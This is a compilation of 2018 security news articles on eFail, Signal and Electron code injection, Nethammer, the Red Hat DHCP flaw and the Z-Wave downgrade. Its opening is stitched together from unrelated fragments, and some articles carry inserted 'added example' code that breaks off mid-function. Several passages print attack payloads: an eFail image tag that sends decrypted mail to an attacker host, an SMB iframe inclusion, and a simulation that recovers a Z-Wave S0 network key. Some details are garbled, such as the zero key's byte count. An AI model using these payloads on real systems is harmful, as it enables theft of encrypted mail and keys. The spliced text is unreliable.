It seems we need to keep our mobile devices safe. Well, this is not the first case of theft; we’ve seen many cases in the past too. One of them happened in March 2018, when a malware campaign that attempted to install a resource-draining currency miner on more than 400,000 computers in 12 hours was traced to a malicious backdoor sneaked into a BitTorrent application called Mediaget, a Microsoft researcher said. Researchers called it a supply-chain attack, which aims to infect large numbers of people by compromising a popular piece of hardware or software.

Many people have questions about torrenting. Millions of people don’t know whether torrenting is legal or illegal. Well, torrenting carries risks. Authorities will catch and punish you if you torrent copyrighted material. Also, there is a risk of downloading infected files. All you need is the best tool or any software that will keep you safe from these kinds of threats.

I reached out to Sergey Lupanin, Head of the Cyber Investigation Department at Group-IB, for a comment:

“Actually this trojan is quite simple and private, meaning there are no descriptions or screenshots on dark-web forums. And its early versions didn’t interact with any mobile banking services. Users entered their card data and permitted this application to work with SMS messages.

The Trojan used the HTTPS protocol with a self-signed certificate to work with C2 servers and sent the user’s card data to the actor. The actor entered this data (which included card number, CVV code, expiration date, and owner name) into a card2card service. The user received an SMS with a transaction authorization code, which was intercepted by this application and sent to the actor for transaction approval. And that’s it. Later this trojan received additional functionality: the ability to work with mobile banks via SMS, thus not requiring the threat actor to use any card2card service.”


Nethammer—Exploiting DRAM Rowhammer Bug Through Network Requests
25.5.2018 thehackernews  
Exploit
Last week, we reported about the first network-based remote Rowhammer attack, dubbed Throwhammer, which involves the exploitation of a known vulnerability in DRAM through network cards using remote direct memory access (RDMA) channels.
However, a separate team of security researchers has now demonstrated a second network-based remote Rowhammer technique that can be used to attack systems using uncached memory or a flush instruction while processing network requests.
The research was carried out by the researchers who discovered the Meltdown and Spectre CPU vulnerabilities, a team independent of the Amsterdam researchers who presented a series of Rowhammer attacks, including the Throwhammer attack published last week.
If you are unaware, Rowhammer is a critical issue with recent generation dynamic random access memory (DRAM) chips in which repeatedly accessing a row of memory can cause "bit flipping" in an adjacent row, allowing attackers to change the contents of the memory.
The issue has since been exploited in a number of ways to escalate an attacker's privilege to kernel level and achieve remote code execution on the vulnerable systems, but the attacker needed access to the victim’s machine.
However, the new Rowhammer attack technique, dubbed Nethammer, can be used to execute arbitrary code on the targeted system by rapidly writing and rewriting memory used for packet processing, which would be possible only with a fast network connection between the attacker and victim.
This causes a high number of memory accesses to the same set of memory locations, which eventually induces disturbance errors in DRAM and causes memory corruption by unintentionally flipping the DRAM bit-value.
The resulting data corruption can then be manipulated by the attacker to gain control over the victim's system.
"To mount a Rowhammer attack, memory accesses need to be directly served by the main memory. Thus, an attacker needs to make sure that the data is not stored in the cache," the research paper [PDF] reads.
Since caching makes an attack difficult, the researchers developed ways that allowed them to bypass the cache and attack directly into the DRAM to cause the row conflicts in the memory cells required for the Rowhammer attack.
Researchers tested Nethammer with three cache-bypass techniques:
A kernel driver that flushes (and reloads) an address whenever a packet is received.
Intel Xeon CPUs with Intel CAT for fast cache eviction.
Uncached memory on an ARM-based mobile device.
All three scenarios are possible, the researchers showed.
In their experimental setup, researchers were successfully able to induce a bit flip every 350 ms by sending a stream of UDP packets with up to 500 Mbit/s to the target system.
Since, in contrast to a regular Rowhammer attack, the Nethammer technique does not require any attack code on the target (for example, no attacker-controlled code on the system), most countermeasures do not prevent this attack.
Since Rowhammer exploits a computer hardware weakness, no software patch can completely fix the issue. Researchers believe the Rowhammer threat is not only real but also has potential to cause real, severe damage.
For more in-depth details on the new attack technique, you can head on to this paper, titled "Nethammer: Inducing Rowhammer Faults through Network Requests," published by the researchers earlier this week.


Critical Flaws in PGP and S/MIME Tools Can Reveal Encrypted Emails in Plaintext
25.5.2018 thehackernews 
Vulnerability
Note—the technical details of the vulnerabilities introduced in this article have now been released, so you should also read our latest article to learn how the eFail attack works and what users can do to protect themselves.
An important warning for people using widely used email encryption tools—PGP and S/MIME—for sensitive communication.
A team of European security researchers has released a warning about a set of critical vulnerabilities discovered in PGP and S/MIME encryption tools that could reveal your encrypted emails in plaintext.
What's worse? The vulnerabilities also impact encrypted emails you sent in the past.
PGP, or Pretty Good Privacy, is an open source end-to-end encryption standard used to encrypt emails in a way that no one, not even the company, government, or cyber criminals, can spy on your communication.
S/MIME, Secure/Multipurpose Internet Mail Extensions, is an asymmetric cryptography-based technology that allows users to send digitally signed and encrypted emails.
Sebastian Schinzel, computer security professor at Münster University of Applied Sciences, took to Twitter to warn users of the issue, and said that "there are currently no reliable fixes for the vulnerability."
The Electronic Frontier Foundation (EFF) has also confirmed the existence of “undisclosed” vulnerabilities and recommended that users uninstall PGP and S/MIME applications until the flaws are patched.
"EFF has been in communication with the research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages," the organisation said in its blog post.
"Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email."
So, until the vulnerabilities are patched, users are advised to stop sending and especially reading PGP-encrypted emails for now, and use alternative end-to-end secure tools, such as Signal.
EFF has warned users to immediately disable any of the following plugins/tools for managing encrypted emails, if they have them installed:
Thunderbird with Enigmail
Apple Mail with GPGTools
Outlook with Gpg4win
It should be noted that the researchers have not claimed that the flaws reside in the way the encryption algorithms work; instead, the issues appear in the way email decryption tools/plugins work.
The full technical details of the vulnerabilities will be released in a paper on Tuesday at 7 am UTC (3 am Eastern, midnight Pacific time).
Stay Tuned to The Hacker News for further details on the vulnerabilities.


Simple bug could lead to RCE flaw on apps built with Electron Framework
25.5.2018 thehackernews 
Vulnerability
A critical remote code execution vulnerability has been discovered in the popular Electron web application framework that could allow attackers to execute malicious code on victims' computers.
Electron is an open source app development framework that powers thousands of widely-used desktop applications including WhatsApp, Skype, Signal, Wordpress, Slack, GitHub Desktop, Atom, Visual Studio Code, and Discord.
Besides its own modules, Electron framework also allows developers to create hybrid desktop applications by integrating Chromium and Node.js framework through APIs.
Since Node.js is a robust framework for server-side applications, having access to its APIs indirectly gives Electron-based apps more control over the operating system installed on the server.
To prevent unauthorised or unnecessary access to Node.js APIs, the Electron framework by default sets the value of "webviewTag" to false in its "webPreferences" configuration file, which then sets "nodeIntegration" to false.
This configuration file with the hardcoded values of some parameters was introduced in the framework to prevent real-time modifications by malicious functions, i.e., by exploiting a security vulnerability like cross-site scripting (XSS).
Moreover, if an app developer skips or forgets to declare "webviewTag: false" in the configuration file, even then the framework by default considers the value of "nodeIntegration" as false, to take a preventive measure.

However, Trustwave researcher Brendan Scarvell has released proof-of-concept (PoC) code that attackers can inject into targeted applications running without "webviewTag" declared, by exploiting a cross-site scripting flaw, to achieve remote code execution.
The exploit re-enables "nodeIntegration" in runtime, allowing attackers to gain unauthorised control over the application server and execute arbitrary system commands.
It should be noted that the exploit would not work if the developer has also opted for one of the following options:
nativeWindowOpen option enabled in its webPreferences.
Intercepting new-window events and overriding event.newGuest without using the supplied options tag.
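The second of the two mitigations listed above, as an added example that is not code from Trustwave's post or from Electron: a new-window handler that creates the child window itself and overrides event.newGuest without reusing the options supplied with the event. It assumes the Electron 2.x API names (the new-window event, event.newGuest, webPreferences); the BrowserWindow class is injected so the guard can be exercised outside Electron with the constructed stand-ins at the bottom.

```javascript
// Added example, not from Trustwave's post or from Electron.
// Assumes Electron 2.x API names: the 'new-window' webContents event,
// event.newGuest and the webPreferences object.

// The only webPreferences any child window ever gets. The options that arrived
// with the event are deliberately discarded, so a renderer that controls the
// window.open() feature string cannot re-enable nodeIntegration in the popup.
function childWebPreferences(suppliedOptions) {
  void suppliedOptions; // intentionally unused
  return {
    nodeIntegration: false,
    contextIsolation: true,
    webviewTag: false,
  };
}

// Only navigate child windows to https origins; anything else is dropped.
function isAllowedChildUrl(url) {
  return /^https:\/\//i.test(url);
}

// Wire the guard onto a window. `BrowserWindow` is passed in rather than
// required here so the same function runs with a stand-in class below.
function attachNewWindowGuard(win, BrowserWindow) {
  win.webContents.on('new-window', (event, url, frameName, disposition, options) => {
    event.preventDefault(); // never let Electron build the window from `options`
    if (!isAllowedChildUrl(url)) {
      return; // blocked: event.newGuest stays unset, so no window opens
    }
    const child = new BrowserWindow({ webPreferences: childWebPreferences(options) });
    child.loadURL(url);
    event.newGuest = child;
  });
}

// Real wiring, only callable inside an Electron main process.
function createMainWindow() {
  const { BrowserWindow } = require('electron');
  const win = new BrowserWindow({
    webPreferences: { nodeIntegration: false, webviewTag: false, nativeWindowOpen: true },
  });
  attachNewWindowGuard(win, BrowserWindow);
  return win;
}

// Minimal stand-ins, constructed for this example, so the guard can be run
// without Electron: a fake BrowserWindow and a fake webContents emitter.
class FakeBrowserWindow {
  constructor(opts) { this.opts = opts; this.loaded = null; }
  loadURL(url) { this.loaded = url; }
}

function makeFakeWindow() {
  const handlers = {};
  return {
    webContents: { on: (name, fn) => { handlers[name] = fn; } },
    emit: (name, ...args) => handlers[name](...args),
  };
}

// Simulate a renderer asking for a popup while supplying its own options
// (e.g. an attempt to get nodeIntegration: true). Returns the event so the
// caller can inspect what the guard decided.
function simulateNewWindow(url, suppliedOptions) {
  const win = makeFakeWindow();
  attachNewWindowGuard(win, FakeBrowserWindow);
  const event = {
    prevented: false,
    preventDefault() { this.prevented = true; },
    newGuest: undefined,
  };
  win.emit('new-window', event, url, '', 'new-window', suppliedOptions);
  return event;
}
```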
The vulnerability, tracked as CVE-2018-1000136, was reported to the Electron team by Scarvell earlier this year and affected all versions of Electron at the time of discovery.
Electron developers patched the vulnerability in March 2018 with the release of versions 1.7.13, 1.8.4, and 2.0.0-beta.4.
So, app developers should ensure their applications are patched, or at least not vulnerable to this issue.
For more technical details on the Electron vulnerability and PoC exploit code, you can head on to Trustwave's blog post.
It should also be noted that the Electron bug has nothing to do with the recently discovered flaw in Signal app, which has also recently patched a critical cross-site scripting vulnerability that leads to remote code execution, whose full technical details are scheduled to be published exclusively on The Hacker News this evening. Stay Tuned!


Here's How eFail Attack Works Against PGP and S/MIME Encrypted Emails
25.5.2018 thehackernews  Krypto
With a heavy heart, security researchers have released early the details of a set of vulnerabilities discovered in email clients for two widely used email encryption standards—PGP and S/MIME—after someone leaked their paper on the Internet, which was actually scheduled for tomorrow.
PGP and S/MIME are popular end-to-end encryption standards used to encrypt emails in a way that no one, not even the company, government, or cyber criminals, can spy on your communication.
Before explaining how the vulnerability works, it should be noted that the flaw doesn't reside in the email encryption standards themselves; instead, it affects a few email clients/plugins that incorrectly implemented the technologies.


Dubbed eFail by the researchers, the vulnerabilities, as described in our previous early-warning article, could allow potential attackers to decrypt the content of your end-to-end encrypted emails in plaintext, even for messages sent in the past.
According to the paper released by a team of European security researchers, the vulnerabilities exist in the way encrypted email clients handle HTML emails and external resources, like loading of images, styles from external URLs.
Here's How the eFail Attack Works:

Email clients are usually configured to automatically decrypt the content of encrypted emails you receive, but if your client is also configured to load external resources automatically, attackers can abuse this behavior to steal messages in plaintext just by sending you a modified version of the same encrypted email content.
The attack requires injecting plaintext into the encrypted mail; the exploit then exfiltrates the originally encrypted data as soon as any recipient's mail client accesses (or decrypts) the message.
It should be noted that to perform an eFail attack, an attacker must have access to your encrypted emails, which are then modified in the following way and sent back to you in order to trick your email client into revealing the secret message to the remote attacker without alerting you.


As described in the proof-of-concept attack released by the researchers, the attacker uses one of the encrypted messages you are supposed to receive or might have already received and then turns it into a multipart HTML email message, as well as forges the return address, so it appears to come from the original sender.
In the newly composed email, the attacker adds an unclosed image tag, like this <img src="https://attackersite.com/ just before the encrypted content and ends it by adding the end of the image tag, like this: .jpg">, as clearly shown in the screenshot.
When your vulnerable email client receives this message, it decrypts the encrypted part of the message given in the middle, and then automatically tries to render the HTML content, i.e., the image tag with all the decrypted text as the new name of the image, as shown below.

Since your email client will try to load the image from the attacker-controlled server, the attacker can capture this incoming request, where the filename contains the full content of the original encrypted email in plaintext.
Although PGP has been designed to show you a warning note if the integrity of your email is compromised, a few email clients do not display these warnings, allowing any potential attackers to perform eFail attacks successfully.
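The message shape described above lends itself to a gateway-side check before the mail ever reaches a decrypting client. The following is an added example, not code from the eFail paper or from any mail client: it parses the top-level MIME parts of a message and flags an HTML part with an unclosed tag placed ahead of the encrypted part. It assumes a top-level multipart/mixed message with a boundary parameter, does not descend into nested multiparts, and uses messages constructed for this illustration; it generalises the <img> case in the text to any unclosed tag.

```javascript
// Added example, not from the eFail paper or any mail client. Simplified MIME
// handling: top-level parts only, boundary taken from the outer Content-Type.

function escapeRegex(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// Split a raw message (or part) into header block and body at the first blank line.
function splitHeadersBody(raw) {
  const m = raw.match(/\r?\n\r?\n/);
  if (!m) return { headers: raw, body: '' };
  return { headers: raw.slice(0, m.index), body: raw.slice(m.index + m[0].length) };
}

// Media type from a header block, lower-cased, parameters stripped.
function contentType(headers) {
  const m = headers.match(/^content-type:\s*([^;\r\n]+)/im);
  return m ? m[1].trim().toLowerCase() : 'text/plain';
}

// Return the top-level MIME parts as { contentType, body } objects.
function parseTopLevelParts(raw) {
  const { headers, body } = splitHeadersBody(raw);
  const b = headers.match(/boundary="?([^";\r\n]+)"?/i);
  if (!b) return []; // not multipart at the top level: nothing to wrap
  // Delimiter lines: --boundary, and --boundary-- for the closing one.
  const delim = new RegExp(`^--${escapeRegex(b[1])}(?:--)?[ \\t]*\\r?$`, 'm');
  const pieces = body.split(delim);
  // pieces[0] is the preamble and the last piece is the epilogue; drop both.
  return pieces.slice(1, -1).map((piece) => {
    const part = splitHeadersBody(piece.replace(/^\r?\n/, ''));
    return { contentType: contentType(part.headers), body: part.body.replace(/\r?\n$/, '') };
  });
}

// S/MIME enveloped data, PGP/MIME, or an inline ASCII-armoured PGP message.
function isEncryptedPart(part) {
  const encryptedTypes = ['application/pkcs7-mime', 'application/x-pkcs7-mime', 'multipart/encrypted'];
  return encryptedTypes.includes(part.contentType) || part.body.includes('-----BEGIN PGP MESSAGE-----');
}

// True when the HTML body ends inside a tag that was never closed, which is
// what makes the decrypted text that follows become part of a URL attribute.
function hasUnclosedTag(body) {
  return /<[a-z][^>]*$/i.test(body.trim());
}

// Flag a message when an HTML part with an unclosed tag precedes an encrypted
// part at the top level. Returns a small verdict object for logging or policy.
function detectEfailWrapper(raw) {
  const parts = parseTopLevelParts(raw);
  const encIdx = parts.findIndex(isEncryptedPart);
  if (encIdx === -1) return { suspicious: false, reason: 'no encrypted part' };
  const wrapper = parts.slice(0, encIdx).findIndex(
    (p) => p.contentType === 'text/html' && hasUnclosedTag(p.body));
  if (wrapper === -1) return { suspicious: false, reason: 'encrypted part not wrapped' };
  return { suspicious: true, reason: `unclosed HTML tag in part ${wrapper} precedes encrypted part ${encIdx}` };
}

// Constructed sample in the wrapper shape described in the text. The
// ciphertext is a labelled placeholder, not real S/MIME data.
const EFAIL_SHAPED = [
  'From: alice@example.com',
  'To: bob@example.com',
  'Subject: constructed sample',
  'Content-Type: multipart/mixed; boundary="BOUNDARY-X"',
  '',
  '--BOUNDARY-X',
  'Content-Type: text/html',
  '',
  '<img src="https://attacker.example/',
  '--BOUNDARY-X',
  'Content-Type: application/pkcs7-mime; smime-type=enveloped-data',
  'Content-Transfer-Encoding: base64',
  '',
  'CIPHERTEXT-PLACEHOLDER',
  '--BOUNDARY-X',
  'Content-Type: text/html',
  '',
  '.jpg">',
  '--BOUNDARY-X--',
  '',
].join('\r\n');

// Constructed benign sample: a closed HTML note followed by a PGP/MIME part.
const BENIGN = [
  'From: alice@example.com',
  'Content-Type: multipart/mixed; boundary=plain1',
  '',
  '--plain1',
  'Content-Type: text/html',
  '',
  '<p>Hi Bob, the encrypted part follows.</p>',
  '--plain1',
  'Content-Type: multipart/encrypted; protocol="application/pgp-encrypted"',
  '',
  'CIPHERTEXT-PLACEHOLDER',
  '--plain1--',
].join('\r\n');
```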
How To Prevent Against eFail Attacks

Generally, it is a very tough job for an adversary to even intercept your encrypted emails, but people who depend on email encryption tend to attract well-resourced and sophisticated attackers.
Ditching the use of PGP or S/MIME to prevent eFail attacks would be stupid advice, as it is quite easy to mitigate the reported issues.
Users can switch to a good email client that always shows a warning when the integrity of the emails is compromised and doesn't render HTML emails by default to prevent loading of external resources automatically.
Researchers also advise users to adopt an authenticated encryption algorithm for sensitive communication.
The research was conducted by a team of researchers, including Damian Poddebniak, Christian Dresen, Fabian Ising, and Sebastian Schinzel from Munster University of Applied Sciences; Jens Müller, Juraj Somorovsky, and Jörg Schwenk from Ruhr University Bochum; and Simon Friedberger from KU Leuven.
For more in-depth details on the attack technique, you can head on to this informational page about the eFail attack and the paper [PDF] titled, "Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels," published by the researchers.


Adobe Releases Critical Security Updates for Acrobat, Reader and Photoshop CC
25.5.2018 thehackernews 
Vulnerability
Adobe has just released new versions of its Acrobat DC, Reader and Photoshop CC for Windows and macOS users that patch 48 vulnerabilities in its software.
A total of 47 vulnerabilities affect Adobe Acrobat and Reader applications, and one critical remote code execution flaw has been patched in Adobe Photoshop CC.
Of the 47, 24 are critical vulnerabilities in Adobe Acrobat and Reader—categorized as Double Free, Heap Overflow, Use-after-free, Out-of-bounds write, Type Confusion, and Untrusted pointer dereference—which, if exploited, could allow arbitrary code execution in the context of the targeted user.
The remaining 23 flaws, including Security Bypass, Out-of-bounds read, Memory Corruption, NTLM SSO hash theft, and HTTP POST newline injection via XFA submission, are marked as important and can lead to information disclosure or security bypass.

The above-listed vulnerabilities impact the Windows and macOS versions of Acrobat DC (Consumer and Classic 2015), Acrobat Reader DC (Consumer and Classic 2015), Acrobat 2017, and Acrobat Reader 2017.
The latest Adobe Acrobat and Reader patches have been given a priority rating of "1," which means the flaws are either being exploited in the wild or more likely to be exploited in the wild. So, users are highly recommended to update their software as soon as possible.
The flaws have been addressed in Acrobat DC and Acrobat Reader DC version 2018.011.20040, Acrobat 2017 and Acrobat Reader DC 2017 version 2017.011.30080, as well as Acrobat Reader DC (Classic 2015) and Acrobat DC (Classic 2015) version 2015.006.30418.
Security Patch for Adobe Photoshop CC
Adobe has also released security patches for the Windows and macOS versions of Photoshop CC to address a critical vulnerability, categorized as "out-of-bounds write" issue, which can be exploited to execute arbitrary code in the context of the current user.
The vulnerability (CVE-2018-4946) impacts Photoshop CC 2018 version 19.1.3 and earlier 19.x versions, as well as Photoshop CC 2017 version 18.1.3 and earlier 18.x versions.
The company credited researcher Giwan Go of Trend Micro's Zero Day Initiative for reporting the flaw, which has been addressed with the release of Photoshop CC 2018 version 19.1.4 and Photoshop CC 2017 version 18.1.4.
This update has been given a priority rating of "3," which means the attackers have not targeted the vulnerability.
Adobe recommends that end users and administrators install the latest security updates as soon as possible.


Hackers Reveal How Code Injection Attack Works in Signal Messaging App
25.5.2018 thehackernews 
Vulnerability
After the revelation of the eFail attack details, it's time to reveal how the recently reported code injection vulnerability in the popular end-to-end encrypted Signal messaging app works.
As we reported last weekend, Signal has patched its messaging app for Windows and Linux that suffered a code injection vulnerability discovered and reported by a team of white-hat hackers from Argentina.
The vulnerability could have been exploited by remote attackers to inject a malicious payload inside the Signal desktop app running on the recipients' system just by sending them a specially crafted link—without requiring any user interaction.
According to a blog post published today, the vulnerability was accidentally discovered while researchers–Iván Ariel Barrera Oro, Alfredo Ortega and Juliano Rizzo–were chatting on Signal messenger and one of them shared a link of a vulnerable site with an XSS payload in its URL.
However, the XSS payload unexpectedly got executed on the Signal desktop app.

XSS, also known as cross-site scripting, is a common attack vector that allows attackers to inject malicious code into a vulnerable web application.
After analyzing the scope of this issue by testing multiple XSS payloads, researchers found that the vulnerability resides in the function responsible for handling shared links, allowing attackers to inject user-defined HTML/JavaScript code via iFrame, image, video and audio tags.
Using this vulnerability, attackers can even inject a form into the recipient's chat window, tricking them into revealing sensitive information through social engineering.
It had previously been speculated that the Signal flaw might have allowed attackers to execute system commands or gain sensitive information like decryption keys—but no, it is not the case.
The vulnerability was immediately patched by the Signal developers shortly after the proof-of-concept video was released by Ortega last weekend.

The researchers also found that a patch (regex function to validate URLs) for this vulnerability existed in previous versions of the desktop app, but it was somehow removed or skipped in the Signal update released on 10th April this year.
Now, after knowing full details of the vulnerability, it seems that the issue is not a critical or dangerous one, as speculated.
So you can freely rely on Signal for encrypted communication without any worries. Just make sure the service is always up-to-date.


Red Hat Linux DHCP Client Found Vulnerable to Command Injection Attacks
25.5.2018 thehackernews 
Vulnerability
A Google security researcher has discovered a critical remote command injection vulnerability in the DHCP client implementation of Red Hat Linux and its derivatives such as the Fedora operating system.
The vulnerability, tracked as CVE-2018-1111, could allow attackers to execute arbitrary commands with root privileges on targeted systems.
Whenever your system joins a network, it’s the DHCP client application which allows your system to automatically receive network configuration parameters, such as an IP address and DNS servers, from the DHCP (Dynamic Host Configuration Protocol) server.
The vulnerability resides in the NetworkManager integration script included in the DHCP client packages which is configured to obtain network configuration using the DHCP protocol.
Felix Wilhelm from the Google security team found that attackers with a malicious DHCP server, or connected to the same network as the victim, can exploit this flaw by spoofing DHCP responses, eventually allowing them to run arbitrary commands with root privileges on a victim's system running a vulnerable DHCP client.
Although full details of the vulnerability have not been released, Wilhelm claims his PoC exploit code is so short that it can even fit in a tweet.
Meanwhile, Barkın Kılıç, a security researcher from Turkey, has released a tweetable proof-of-concept exploit code for the Red Hat Linux DHCP client vulnerability on Twitter.

In its security advisory, Red Hat has confirmed that the vulnerability impacts Red Hat Enterprise Linux 6 and 7, and that all of its customers running affected versions of the dhclient package should update their packages to the newer versions as soon as they are available.
"Users have the option to remove or disable the vulnerable script, but this will prevent certain configuration parameters provided by the DHCP server from being configured on a local system, such as addresses of the local NTP or NIS servers," Red Hat warns.
Fedora has also released new versions of DHCP packages containing fixes for Fedora 26, 27, and 28.
Other popular Linux distributions like openSUSE and Ubuntu do not appear to be impacted by the vulnerability, as their DHCP client implementations don't include the NetworkManager integration script by default.


Another severe flaw in Signal desktop app lets hackers steal your chats in plaintext
25.5.2018 thehackernews 
Vulnerability
For the second time in less than a week, users of the popular end-to-end encrypted Signal messaging app have to update their desktop applications once again to patch another severe code injection vulnerability.
Discovered Monday by the same team of security researchers, the newly discovered vulnerability poses the same threat as the previous one, allowing remote attackers to inject malicious code on the recipients' Signal desktop app just by sending them a message—without requiring any user interaction.
To understand more about the first code injection vulnerability (CVE-2018-10994), you can read our previous article covering how researchers find the Signal flaw and how it works.
The only difference between the two is that the previous flaw resides in the function that handles links shared in the chat, whereas the new vulnerability (CVE-2018-11101) exists in a different function that handles the validation of quoted messages, i.e., quoting a previous message in a reply.

In other words, to exploit the newly patched bug on vulnerable versions of the Signal desktop app, all an attacker needs to do is send malicious HTML/JavaScript code as a message to the victim, and then quote/reply to that same message with any random text.
If the victim receives this quoted message containing the malicious payload on their vulnerable Signal desktop app, it will automatically execute the payload, without requiring any user interaction.
Exploiting Signal Code Injection to Steal Plaintext Chats

Until now the proof-of-concept payloads used to demonstrate code injection vulnerabilities in Signal were limited to embedding an HTML iFrame, or image/video/audio tags onto the victim's desktop app.
However, researchers have now managed to craft a new PoC exploit that could allow remote attackers to successfully steal all Signal conversations of the victims in the plaintext just by sending them a message.
This hack literally defeats the purpose of an end-to-end encrypted messaging app, allowing remote attackers to easily get hold of users' plain-text conversations without breaking the encryption.
Attackers Could Possibly Steal Windows Password As Well
What's worse?
In their blog post, the researchers also indicated that an attacker could even include files from a remote SMB share using an HTML iFrame, which can be abused to steal NTLMv2 hashed password for Windows users.
"In the Windows operative system, the CSP fails to prevent remote inclusion of resources via the SMB protocol. In this case, remote execution of JavaScript can be achieved by referencing the script in an SMB share as the source of an iframe tag, for example: <iframe src=\\DESKTOP-XXXXX\Temp\test.html> and then replying to it," the researchers explain.
Though they haven't claimed anything about this form of attack, I speculate that if an attacker can exploit the code injection to force Windows to initiate automatic authentication with an attacker-controlled SMB server using single sign-on, it would eventually hand over the victim's username and NTLMv2 hashed password to the attacker, potentially allowing them to gain access to the victim's system.
We have seen how the same attack technique was recently exploited using a vulnerability in Microsoft Outlook, disclosed last month.
I cannot verify this claim at the moment, but we are in contact with a few security researchers to confirm it.
Researchers—Iván Ariel Barrera Oro, Alfredo Ortega, Juliano Rizzo, and Matt Bryant—responsibly reported the vulnerability to Signal, and its developers have patched the vulnerability with the release of Signal desktop version 1.11.0 for Windows, macOS, and Linux users.
However, The Hacker News has learned that Signal developers had already identified this issue as part of a comprehensive fix for the first vulnerability before the researchers found and reported it.
The Signal desktop app has an auto-update mechanism, so most users should already have the update installed. You can read this guide to check that you are running an updated version of Signal.
If you are not, update Signal for desktop immediately: the vulnerability exposes your private conversations in plaintext to attackers, with the further consequences described above.


New Features Added to CERT Tapioca Tool
25.5.2018 securityweek  Safety

The CERT Coordination Center (CERT/CC) at Carnegie Mellon University this week announced the launch of a new version of the network traffic analysis tool CERT Tapioca.

CERT Tapioca was first released in 2014 as a network-layer man-in-the-middle (MITM) proxy virtual machine designed for identifying apps that fail to validate certificates and investigating the content of HTTP and HTTPS traffic.

CERT Tapioca has been used to identify Android applications that fail to properly validate SSL certificates and therefore expose users to MITM attacks. More than one million apps have been checked and over 23,000 of them failed dynamic testing.

The tool can be used to analyze network traffic not only on smartphones, but also on IoT devices, computers and VMs.

Will Dormann, vulnerability analyst at CERT/CC and developer of CERT Tapioca, on Thursday announced the release of version 2.0, which introduces a graphical user interface and can be installed on multiple Linux distributions, including Red Hat, CentOS, Fedora, Ubuntu, OpenSUSE, and Raspbian.

CERT Tapioca

CERT Tapioca 2.0 also allows users to set up a HOSTAP-compatible Wi-Fi adapter for wireless connectivity, and it can save results from multiple tested systems.

In addition to checking HTTPS validation, verifying an application’s use of modern cryptography standards, and observing the hosts contacted by an application, Tapioca now allows users to search network traffic for specified strings, such as passwords.

The CERT Tapioca 2.0 source code, along with additional details and usage instructions, are available on GitHub.


100 Million IoT Devices Possibly Exposed to Z-Wave Attack
25.5.2018 securityweek  IoT

Researchers have demonstrated that the Z-Wave wireless communications protocol, which is used by more than 100 million Internet-of-Things (IoT) devices, is vulnerable to security downgrade attacks.

Z-Wave, a protocol primarily used for home automation, uses low-energy radio waves for wireless communications over distances of up to 100 meters (330 feet). Z-Wave was developed by Zensys in 2001 and in 2008 it was acquired by Sigma Designs, which recently sold it to Silicon Labs for $240 million.

According to the Z-Wave Alliance, an organization dedicated to advancing Z-Wave, the protocol is currently used by 700 companies in over 2,400 IoT and smart home products, including thermostats, locks and home monitoring systems.

UK-based Pen Test Partners analyzed Z-Wave and found that an attacker within radio range while a device is being paired can force the pairing down to the weak legacy scheme and recover the network key that is supposed to secure communications.

Z-Wave vulnerable to downgrade attack

The researchers demonstrated their findings on a Yale smart lock – they showed how an attacker can unlock a door – but the method, which they have dubbed “Z-Shave,” works against any device using Z-Wave.

Z-Wave relies on a shared network key to secure traffic between the controller and the client device when they are paired. The initial version of the pairing process, known as S0, was found to be vulnerable to sniffing attacks back in 2013, which led to the introduction of a more secure process named S2.

The problem with S0 is that, during pairing, it protects the network key with a fixed, publicly known temporary key (sixteen zero bytes, 0000000000000000), so anyone in range who captures the key exchange can decrypt it and recover the network key. S2 replaces this with a real key agreement between the two devices, but the researchers found that an attacker can downgrade the pairing from S2 to S0, removing that protection.
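The downgrade and the reason S0's key exchange is readable, as an added simulation that is neither Z-Wave's nor Pen Test Partners' code. The controller picks the strongest security class both sides advertise; the attacker rewrites the joining node's advertisement so only S0 remains, and the network key then crosses the air protected only by a key derived from the fixed all-zero temporary key. Z-Wave S0 actually uses AES-128 (OFB for encryption plus a CBC-MAC); the keystream here is an HMAC-SHA256 stand-in so the example runs on the standard library, and the class names, frame layout and `z_shave` function are simplifications for illustration.

```python
# Added example (not Z-Wave or Pen Test Partners code): a simulation of the
# S2-to-S0 downgrade and why S0's key exchange can be read by a sniffer.
# Z-Wave S0 encrypts with AES-128 in OFB mode; the keystream function below
# is a stand-in built from HMAC-SHA256 so the example runs on the standard
# library. Names and frame layouts are simplified for illustration.
import hashlib
import hmac
import secrets

S0 = "S0"
S2_UNAUTH = "S2_Unauthenticated"
S2_AUTH = "S2_Authenticated"
S2_ACCESS = "S2_AccessControl"
RANK = {S0: 0, S2_UNAUTH: 1, S2_AUTH: 2, S2_ACCESS: 3}

# The temporary key S0 uses while the real network key is transferred during
# inclusion: sixteen zero bytes, fixed by the protocol, hence known to everyone.
S0_TEMP_KEY = bytes(16)


def choose_class(controller_supports, node_advertises):
    """Controller picks the strongest class both sides claim to support."""
    common = set(controller_supports) & set(node_advertises)
    return max(common, key=RANK.__getitem__) if common else None


def z_shave(node_advertises):
    """Attacker in radio range rewrites the node's capability advertisement so
    that only S0 remains; the controller then pairs at S0."""
    return [c for c in node_advertises if c == S0]


def keystream_xor(key, nonce, data):
    """Stand-in stream cipher (HMAC-SHA256 in counter mode), XORed over data."""
    out = bytearray()
    counter = 0
    while len(out) < len(data):
        block = hmac.new(key, nonce + counter.to_bytes(4, "big"),
                         hashlib.sha256).digest()
        out.extend(block)
        counter += 1
    return bytes(a ^ b for a, b in zip(data, out))


def s0_key_set_frame(network_key, nonce):
    """Controller -> node: the network key, encrypted under the all-zero
    temporary key. The nonce itself travels in the clear."""
    return keystream_xor(S0_TEMP_KEY, nonce, network_key)


def sniffer_recover_key(frame, nonce):
    """Anyone who captured the frame and the clear-text nonce can decrypt it,
    because the only 'secret' involved is the public zero key."""
    return keystream_xor(S0_TEMP_KEY, nonce, frame)


def pair(controller_supports, node_advertises, network_key, attacker_in_range):
    """Simulate inclusion. Returns (class used, key the attacker recovered)."""
    advertised = z_shave(node_advertises) if attacker_in_range else node_advertises
    cls = choose_class(controller_supports, advertised)
    if cls == S0:
        nonce = secrets.token_bytes(8)
        frame = s0_key_set_frame(network_key, nonce)
        recovered = sniffer_recover_key(frame, nonce) if attacker_in_range else None
        return cls, recovered
    # S2 agrees on the key with a public-key exchange; a passive sniffer
    # learns nothing, so nothing is recovered on this path.
    return cls, None


if __name__ == "__main__":
    key = secrets.token_bytes(16)
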